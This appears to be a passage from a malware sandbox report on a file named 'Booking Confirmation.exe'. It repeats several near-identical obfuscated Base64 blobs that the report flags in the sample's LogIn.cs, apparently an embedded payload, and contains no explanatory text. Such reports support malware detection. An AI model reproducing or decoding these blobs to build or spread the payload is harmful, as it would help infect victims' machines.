DNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, LogIn.cs	Base64 encoded string: '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